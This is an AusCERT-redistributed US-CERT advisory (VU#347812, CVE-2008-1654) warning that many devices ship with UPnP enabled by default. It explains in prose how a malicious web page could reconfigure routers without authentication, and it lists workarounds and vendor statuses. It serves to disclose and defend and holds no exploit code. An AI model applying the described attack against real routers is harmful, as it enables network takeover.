Published:
08 April 2008
Protect yourself against future threats.
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2008.0068 -- [Appliance] Vulnerability in UPnP 8 April 2008 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: UPnP Publisher: US-CERT Impact: Execute Arbitrary Code/Commands Modify Arbitrary Files Inappropriate Access Access: Remote/Unauthenticated CVE Names: CVE-2008-1654 Revision History: April 8 2008: Added CVE information January 18 2008: Initial Release - --------------------------BEGIN INCLUDED TEXT-------------------- Vulnerability Note VU#347812 UPnP enabled by default in multiple devices Overview Multiple vendors ship devices with UPnP enabled by default. By convincing a user to open a malicious URL, an attacker may be able to remotely control or configure UPnP enabled devices. I. Description Universal Plug and Play (UPnP) is a collection of protocols maintained and distributed by the UPnP Forum. UPnP is designed to allow network devices to easily connect to each other. UPnP enabled applications may be able to control other UPnP enabled devices such as firewalls or routers automatically and without authentication. Some applications may rely on UPnP to automatically open ports on routers or automatically set other parameters on compatible devices. Multiple vendors ship devices with UPnP enabled by default. These devices may be configured to only listen for UPnP requests on local networks or wireless interfaces. By using browser plugins that execute in the context of the local system, an attacker may be able to send UPnP messages to local devices without authentication. One researcher has demonstrated an attack vector that uses the Adobe Flash plugin. Note that to successfully exploit this vulnerability an attacker would need to be able to guess the IP address of an affected device. This IP address may also be enumerated through browser headers or other methods. II. Impact By convincing a victim to click on a link in an HTML document (web page, HTML email), an attacker could issue any command or change any configuration that can be set via UPnP on an affected device. If the affected device is providing routing or firewalling services to clients, an attacker may be able to change firewall and port forwarding rules, modify DNS settings, change wireless encryption keys, or set arbitrary administration passwords. III. Solution We are currently unaware of a practical solution to this problem. Workarounds for administrators * UPnP should be disabled on devices that are being use to enforce security policies or are connected to untrusted networks, such as the Internet. * Filtering the IGMP protocol between LAN segments may prevent UPnP devices from connecting to networks that they are not authorized to access. Workarounds for users * Disabling UPnP on network devices will mitigate this vulnerability. Note that disabling UPnP will cause any devices or applications that rely on UPnP to fail or operate with reduced functionality. * Disabling UPnP in desktop operating systems may prevent an attacker from exploiting this vulnerability. Microsoft Windows XP users should see the workarounds section of Microsoft Security Bulletin MS07-019 for instructions on how to disable UPnP. * Using the Mozilla Firefox NoScript extension to whitelist web sites that can run scripts and access installed plugins may prevent this vulnerability from being exploited. * Using host-based firewalls to filter ports 1900/udp and 2869/tcp both inbound and outbound may prevent this vulnerability from being exploited by blocking the ports that UPnP uses. Note that the Windows Vista firewall blocks UPnP by default. This workaround may not be able to prevent exploitation of this vulnerability. Systems Affected Vendor Status Date Updated 3com, Inc. Unknown 15-Jan-2008 Alcatel Unknown 15-Jan-2008 Apple Computer, Inc. Unknown 15-Jan-2008 AT&T Unknown 15-Jan-2008 Avaya, Inc. Unknown 15-Jan-2008 Avici Systems, Inc. Unknown 15-Jan-2008 Borderware Technologies Unknown 15-Jan-2008 Bro Unknown 15-Jan-2008 CentOS Unknown 15-Jan-2008 Charlotte's Web Networks Unknown 15-Jan-2008 Check Point Software Technologies Unknown 15-Jan-2008 Cisco Systems, Inc. Unknown 15-Jan-2008 Clavister Unknown 15-Jan-2008 Computer Associates Unknown 15-Jan-2008 Computer Associates eTrust Security Management Unknown 15-Jan-2008 Conectiva Inc. Unknown 15-Jan-2008 Cray Inc. Unknown 15-Jan-2008 D-Link Systems, Inc. Unknown 15-Jan-2008 Data Connection, Ltd. Unknown 15-Jan-2008 Debian GNU/Linux Unknown 15-Jan-2008 EMC Corporation Unknown 15-Jan-2008 Engarde Secure Linux Unknown 15-Jan-2008 Enterasys Networks Unknown 15-Jan-2008 Ericsson Unknown 15-Jan-2008 eSoft, Inc. Unknown 15-Jan-2008 Extreme Networks Unknown 15-Jan-2008 F5 Networks, Inc. Unknown 15-Jan-2008 Fedora Project Unknown 15-Jan-2008 Force10 Networks, Inc. Unknown 15-Jan-2008 Fortinet, Inc. Unknown 15-Jan-2008 Foundry Networks, Inc. Unknown 15-Jan-2008 FreeBSD, Inc. Unknown 15-Jan-2008 Fujitsu Unknown 15-Jan-2008 Gentoo Linux Unknown 15-Jan-2008 Global Technology Associates Unknown 15-Jan-2008 Hewlett-Packard Company Unknown 15-Jan-2008 Hitachi Unknown 15-Jan-2008 Hyperchip Unknown 15-Jan-2008 IBM Corporation Unknown 15-Jan-2008 IBM Corporation (zseries) Unknown 15-Jan-2008 IBM eServer Unknown 15-Jan-2008 Ingrian Networks, Inc. Unknown 15-Jan-2008 Intel Corporation Unknown 15-Jan-2008 Internet Security Systems, Inc. Unknown 15-Jan-2008 Intoto Unknown 15-Jan-2008 IP Filter Unknown 15-Jan-2008 Juniper Networks, Inc. Unknown 15-Jan-2008 Linksys (A division of Cisco Systems) Unknown 15-Jan-2008 Lucent Technologies Unknown 15-Jan-2008 Luminous Networks Unknown 15-Jan-2008 m0n0wall Unknown 15-Jan-2008 Mandriva, Inc. Unknown 15-Jan-2008 McAfee Unknown 15-Jan-2008 Microsoft Corporation Unknown 15-Jan-2008 MontaVista Software, Inc. Unknown 15-Jan-2008 Multinet (owned Process Software Corporation) Unknown 15-Jan-2008 Multitech, Inc. Unknown 15-Jan-2008 NEC Corporation Unknown 15-Jan-2008 NetBSD Unknown 15-Jan-2008 netfilter Unknown 15-Jan-2008 Netgear, Inc. Unknown 15-Jan-2008 Network Appliance, Inc. Unknown 15-Jan-2008 NextHop Technologies, Inc. Unknown 15-Jan-2008 Nokia Unknown 15-Jan-2008 Nortel Networks, Inc. Unknown 15-Jan-2008 Novell, Inc. Unknown 15-Jan-2008 OpenBSD Unknown 15-Jan-2008 Openwall GNU/*/Linux Unknown 16-Jan-2008 QNX, Software Systems, Inc. Unknown 15-Jan-2008 RadWare, Inc. Unknown 15-Jan-2008 Red Hat, Inc. Unknown 15-Jan-2008 Redback Networks, Inc. Unknown 15-Jan-2008 Riverstone Networks, Inc. Unknown 15-Jan-2008 Secure Computing Network Security Division Unknown 15-Jan-2008 Secureworx, Inc. Unknown 15-Jan-2008 Silicon Graphics, Inc. Unknown 15-Jan-2008 Slackware Linux Inc. Unknown 15-Jan-2008 SmoothWall Unknown 15-Jan-2008 Snort Unknown 15-Jan-2008 Sony Corporation Unknown 15-Jan-2008 Sourcefire Unknown 15-Jan-2008 Stonesoft Unknown 15-Jan-2008 Sun Microsystems, Inc. Unknown 15-Jan-2008 SUSE Linux Unknown 15-Jan-2008 Symantec, Inc. Unknown 15-Jan-2008 The SCO Group Unknown 15-Jan-2008 TippingPoint, Technologies, Inc. Not Vulnerable 16-Jan-2008 Trustix Secure Linux Unknown 15-Jan-2008 Turbolinux Unknown 15-Jan-2008 Ubuntu Unknown 15-Jan-2008 Unisys Unknown 15-Jan-2008 Watchguard Technologies, Inc. Unknown 15-Jan-2008 Wind River Systems, Inc. Unknown 15-Jan-2008 ZyXEL Unknown 15-Jan-2008 References http://www.upnp.org/ http://www.upnp.org/download/UPnP_Vendor_Implementation_Guide_Jan2001.htm http://www.upnp.org/membership/members.asp http://www.gnucitizen.org/blog/hacking-the-interwebs http://windowshelp.microsoft.com/Windows/en-US/Help/32f3845b-eda0-4168-be8d-90f07250d8101033.mspx http://www.microsoft.com/technet/security/Bulletin/MS07-019.mspx http://www.us-cert.gov/reading_room/securing_browser/ http://noscript.net/features#contentblocking http://linux-igd.sourceforge.net/ http://www.shorewall.net/UPnP.html Credit Information about this vulnerability was released by PDP on the GNUCITIZEN website. This document was written by Ryan Giobbi. Other Information Date Public 01/15/2008 Date First Published 01/15/2008 01:47:51 PM Date Last Updated 01/16/2008 CERT Advisory CVE Name Metric 9.83 Document Revision 52 - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: http://www.auscert.org.au/render.html?cid=1980 If you believe that your computer system has been compromised or attacked in any way, we encourage you to let us know by completing the secure National IT Incident Reporting Form at: http://www.auscert.org.au/render.html?it=3192 =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQCVAwUBR/rDmih9+71yA2DNAQKoswP/aiNdXJ0wRyes4vYCnMz5VYXdl8r7/KSj nZR4twlK2pgBZIYKGvd3LJdb2a6kazi5TYyLLuhYAlq6+7G2PAW6e8CU3aLE2npb qdH+bTe2P3/pJdpqhFp7WqMj9zOGIObRMWGAV25A0EhNd1YOBOa4JfWUOGY4SD1Q 88G9kxhYRN4= =pE/5 -----END PGP SIGNATURE-----